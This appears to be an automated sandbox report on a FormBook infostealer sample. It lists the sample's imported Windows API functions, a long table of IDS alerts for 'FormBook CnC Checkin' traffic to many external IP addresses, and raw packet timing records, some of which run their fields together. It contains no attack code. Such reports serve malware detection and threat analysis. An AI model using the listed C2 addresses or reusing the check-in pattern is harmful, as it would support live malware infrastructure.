                                                                                                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                                                                  OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-22T22:56:30.782310+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 52994 | 188.114.97.3 | 80 | TCP
2024-10-22T22:56:47.092076+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53065 | 52.13.151.179 | 80 | TCP
2024-10-22T22:56:49.901782+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53080 | 52.13.151.179 | 80 | TCP
2024-10-22T22:56:53.020839+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53092 | 52.13.151.179 | 80 | TCP
2024-10-22T22:56:54.995827+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53101 | 52.13.151.179 | 80 | TCP
2024-10-22T22:57:09.236356+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53160 | 103.106.67.112 | 80 | TCP
2024-10-22T22:57:11.792564+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53171 | 103.106.67.112 | 80 | TCP
2024-10-22T22:57:14.327473+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53184 | 103.106.67.112 | 80 | TCP
2024-10-22T22:57:16.920286+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53196 | 103.106.67.112 | 80 | TCP
2024-10-22T22:57:22.860956+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53212 | 188.114.96.3 | 80 | TCP
2024-10-22T22:57:25.455548+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53213 | 188.114.96.3 | 80 | TCP
2024-10-22T22:57:28.095585+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53214 | 188.114.96.3 | 80 | TCP
2024-10-22T22:57:30.667198+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53215 | 188.114.96.3 | 80 | TCP
2024-10-22T22:57:36.418936+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53216 | 3.33.130.190 | 80 | TCP
2024-10-22T22:57:38.963511+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53217 | 3.33.130.190 | 80 | TCP
2024-10-22T22:57:41.471377+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53218 | 3.33.130.190 | 80 | TCP
2024-10-22T22:57:44.059111+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53219 | 3.33.130.190 | 80 | TCP
2024-10-22T22:57:50.026061+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53220 | 217.70.184.50 | 80 | TCP
2024-10-22T22:57:52.573055+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53221 | 217.70.184.50 | 80 | TCP
2024-10-22T22:57:55.121101+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53222 | 217.70.184.50 | 80 | TCP
2024-10-22T22:57:57.606581+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53223 | 217.70.184.50 | 80 | TCP
2024-10-22T22:58:03.728578+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53224 | 94.23.162.163 | 80 | TCP
2024-10-22T22:58:06.241903+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53225 | 94.23.162.163 | 80 | TCP
2024-10-22T22:58:08.699956+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53226 | 94.23.162.163 | 80 | TCP
2024-10-22T22:58:11.229555+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53227 | 94.23.162.163 | 80 | TCP
2024-10-22T22:58:17.396447+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53228 | 103.224.182.242 | 80 | TCP
2024-10-22T22:58:19.957028+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53229 | 103.224.182.242 | 80 | TCP
2024-10-22T22:58:22.627976+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53230 | 103.224.182.242 | 80 | TCP
2024-10-22T22:58:25.173782+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53231 | 103.224.182.242 | 80 | TCP
2024-10-22T22:58:30.955570+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53232 | 209.74.64.187 | 80 | TCP
2024-10-22T22:58:33.520112+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53233 | 209.74.64.187 | 80 | TCP
2024-10-22T22:58:36.071268+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53234 | 209.74.64.187 | 80 | TCP
2024-10-22T22:58:38.635814+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53235 | 209.74.64.187 | 80 | TCP
2024-10-22T22:58:44.668685+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53236 | 65.21.196.90 | 80 | TCP
2024-10-22T22:58:47.257463+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53237 | 65.21.196.90 | 80 | TCP
2024-10-22T22:58:49.776104+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53238 | 65.21.196.90 | 80 | TCP
2024-10-22T22:58:52.300187+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53239 | 65.21.196.90 | 80 | TCP
2024-10-22T22:58:58.205425+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53240 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:00.766304+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53241 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:03.372904+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53242 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:05.960240+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53243 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:11.703664+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53244 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:14.238086+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53245 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:16.757788+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53246 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:19.353782+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53247 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:26.225331+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53248 | 8.210.49.139 | 80 | TCP
2024-10-22T22:59:28.648693+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53249 | 8.210.49.139 | 80 | TCP
2024-10-22T22:59:31.229419+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53250 | 8.210.49.139 | 80 | TCP
2024-10-22T22:59:33.674797+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53251 | 8.210.49.139 | 80 | TCP
2024-10-22T22:59:39.969207+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53252 | 94.23.162.163 | 80 | TCP
2024-10-22T22:59:42.814443+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53253 | 94.23.162.163 | 80 | TCP
2024-10-22T22:59:45.245233+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53254 | 94.23.162.163 | 80 | TCP
2024-10-22T22:59:48.035272+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53255 | 94.23.162.163 | 80 | TCP
2024-10-22T23:00:05.311558+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53256 | 188.114.97.3 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 22:56:30.068485975 CEST | 52994 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 22:56:30.074173927 CEST | 80 | 52994 | 188.114.97.3 | 192.168.2.5
Oct 22, 2024 22:56:30.074259996 CEST | 52994 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 22:56:30.081974983 CEST | 52994 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 22:56:30.087519884 CEST | 80 | 52994 | 188.114.97.3 | 192.168.2.5
Oct 22, 2024 22:56:30.780865908 CEST | 80 | 52994 | 188.114.97.3 | 192.168.2.5
Oct 22, 2024 22:56:30.782128096 CEST | 80 | 52994 | 188.114.97.3 | 192.168.2.5
Oct 22, 2024 22:56:30.782310009 CEST | 52994 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 22:56:30.785337925 CEST | 52994 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 22:56:30.791074991 CEST | 80 | 52994 | 188.114.97.3 | 192.168.2.5
Oct 22, 2024 22:56:46.383563995 CEST | 53065 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:46.389138937 CEST | 80 | 53065 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:46.389224052 CEST | 53065 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:46.405811071 CEST | 53065 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:46.411608934 CEST | 80 | 53065 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:47.091773987 CEST | 80 | 53065 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:47.091932058 CEST | 80 | 53065 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:47.092076063 CEST | 53065 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:47.147456884 CEST | 80 | 53065 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:47.147577047 CEST | 53065 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:47.916908979 CEST | 53065 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:48.935308933 CEST | 53080 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:49.194924116 CEST | 80 | 53080 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:49.195333004 CEST | 53080 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:49.206492901 CEST | 53080 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:49.212213039 CEST | 80 | 53080 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:49.901544094 CEST | 80 | 53080 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:49.901715994 CEST | 80 | 53080 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:49.901782036 CEST | 53080 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:49.957560062 CEST | 80 | 53080 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:49.957681894 CEST | 53080 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:50.713601112 CEST | 53080 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:51.732425928 CEST | 53092 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:51.737993956 CEST | 80 | 53092 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:51.738111973 CEST | 53092 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:51.749663115 CEST | 53092 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:51.757018089 CEST | 80 | 53092 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:51.757095098 CEST | 80 | 53092 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:53.020669937 CEST | 80 | 53092 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:53.020713091 CEST | 80 | 53092 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:53.020777941 CEST | 80 | 53092 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:53.020828962 CEST | 80 | 53092 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:53.020838976 CEST | 53092 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:53.020858049 CEST | 53092 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:53.020876884 CEST | 53092 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:53.021024942 CEST | 80 | 53092 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:53.021073103 CEST | 53092 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:53.030972004 CEST | 80 | 53092 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:53.031055927 CEST | 53092 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:53.260612011 CEST | 53092 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:54.283586025 CEST | 53101 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:54.289082050 CEST | 80 | 53101 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:54.289185047 CEST | 53101 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:54.296303988 CEST | 53101 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:54.301723003 CEST | 80 | 53101 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:54.995570898 CEST | 80 | 53101 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:54.995696068 CEST | 80 | 53101 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:54.995826960 CEST | 53101 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:55.052386999 CEST | 80 | 53101 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:56:55.052521944 CEST | 53101 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:55.053288937 CEST | 53101 | 80 | 192.168.2.5 | 52.13.151.179
Oct 22, 2024 22:56:55.058744907 CEST | 80 | 53101 | 52.13.151.179 | 192.168.2.5
Oct 22, 2024 22:57:08.452213049 CEST | 53160 | 80 | 192.168.2.5 | 103.106.67.112
Oct 22, 2024 22:57:08.458137989 CEST | 80 | 53160 | 103.106.67.112 | 192.168.2.5
Oct 22, 2024 22:57:08.458276987 CEST | 53160 | 80 | 192.168.2.5 | 103.106.67.112
Oct 22, 2024 22:57:08.469630003 CEST | 53160 | 80 | 192.168.2.5 | 103.106.67.112
Oct 22, 2024 22:57:08.475265026 CEST | 80 | 53160 | 103.106.67.112 | 192.168.2.5
Oct 22, 2024 22:57:09.202450037 CEST | 80 | 53160 | 103.106.67.112 | 192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:09.236270905 CEST8053160103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:09.236356020 CEST5316080192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:09.979280949 CEST5316080192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:10.998215914 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:11.004385948 CEST8053171103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:11.004498959 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:11.025197983 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:11.030970097 CEST8053171103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:11.758527994 CEST8053171103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:11.792469025 CEST8053171103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:11.792563915 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:12.541718960 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:13.560170889 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:13.565942049 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:13.566971064 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:13.579629898 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:13.585557938 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:13.585577965 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:14.293406963 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:14.327363014 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:14.327472925 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:15.088792086 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.107116938 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.112533092 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:16.112668037 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.120002985 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.125339031 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:16.886214018 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:16.920070887 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:16.920285940 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.920933962 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.926628113 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:21.971230030 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:21.977217913 CEST8053212188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:21.977349043 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:21.987476110 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:21.992979050 CEST8053212188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:22.858637094 CEST8053212188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:22.860678911 CEST8053212188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:22.860955954 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:23.495991945 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:24.513622046 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:24.519646883 CEST8053213188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:24.519738913 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:24.530455112 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:24.536034107 CEST8053213188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:25.453141928 CEST8053213188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:25.455481052 CEST8053213188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:25.455548048 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:26.047933102 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:27.060930014 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:27.219150066 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:27.219575882 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:27.231601000 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:27.237215042 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:27.237394094 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:28.092438936 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:28.095503092 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:28.095585108 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:28.729248047 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:29.748965979 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:29.754482985 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:29.760962963 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:29.764935017 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:29.770694971 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:30.666951895 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:30.667082071 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:30.667197943 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:30.669820070 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:30.669908047 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:30.670980930 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:30.676459074 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:35.711349010 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:35.716730118 CEST80532163.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:35.716909885 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:35.726953983 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:35.732328892 CEST80532163.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:36.418745995 CEST80532163.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:36.418936014 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:37.231374979 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:37.236901045 CEST80532163.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:38.248119116 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:38.254429102 CEST80532173.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:38.254509926 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:38.265424013 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:38.271037102 CEST80532173.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:38.959467888 CEST80532173.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:38.963510990 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:39.776748896 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:39.783606052 CEST80532173.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:40.795671940 CEST5321880192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:40.801374912 CEST80532183.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:40.801472902 CEST5321880192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:40.811918020 CEST5321880192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:40.817537069 CEST80532183.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:40.817605972 CEST80532183.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:41.465651035 CEST80532183.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:41.471376896 CEST5321880192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:42.323179007 CEST5321880192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:42.329639912 CEST80532183.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:43.341478109 CEST5321980192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:43.347208977 CEST80532193.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:43.348150969 CEST5321980192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:43.357148886 CEST5321980192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:43.362667084 CEST80532193.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:44.021413088 CEST80532193.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:44.058984995 CEST80532193.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:44.059111118 CEST5321980192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:44.060257912 CEST5321980192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:44.065702915 CEST80532193.33.130.190192.168.2.5
